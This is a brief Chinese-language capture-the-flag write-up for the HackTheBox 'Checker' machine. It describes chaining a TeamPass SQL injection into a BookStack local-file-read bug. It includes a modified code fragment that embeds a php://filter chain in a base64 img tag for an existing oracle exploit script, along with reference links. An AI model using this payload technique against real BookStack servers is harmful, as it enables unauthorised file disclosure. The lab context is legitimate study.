HTB_Checker
linux(hard)
总结
user:
CVE-2023-1545->CVE-2023-6199
root:
PWN:race-condition+command_exec,但是我不会
CVE-2023-6199利用要求:
以可能的wrapper格式不断爆破,利用脚本如下:
https://github.com/synacktiv/php_filter_chains_oracle_exploit
对于requestor.py稍作修改
1.html内容是以<img+src='data:image/png;base64,[BASE64 php_wrapper]'/>
的形式
2.需要CSRF-TOKEN字段和Cookie
之前我的更改如下,没有反应,但隔天又能正常利用了。。。嘶,奇怪
filter_chain = f'php://filter/{s}{self.in_chain}/resource={self.file_to_leak}'new_chain = f"<img src='data:image/png;base64,{base64.b64encode(filter_chain.encode()).decode()}'/>"merged_data = self.parse_parameter(new_chain)
PWN部分......emmmm不会
参考
wp:
https://4xura.com/ctf/htb/htb-writeup-checker/
CVE-2023-1545-teampass-SQLinject:
https://security.snyk.io/vuln/SNYK-PHP-NILSTEAMPASSNETTEAMPASS-3367612
CVE-2023-6199:
https://fluidattacks.com/advisories/imagination/
https://fluidattacks.com/blog/lfr-via-blind-ssrf-book-stack/
https://github.com/4xura/php_filter_chain_oracle_poc
php:// wrapper
https://github.com/synacktiv/php_filter_chains_oracle_exploit
原文始发于微信公众号(羽泪云小栈):HTB_Checker(user部分)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论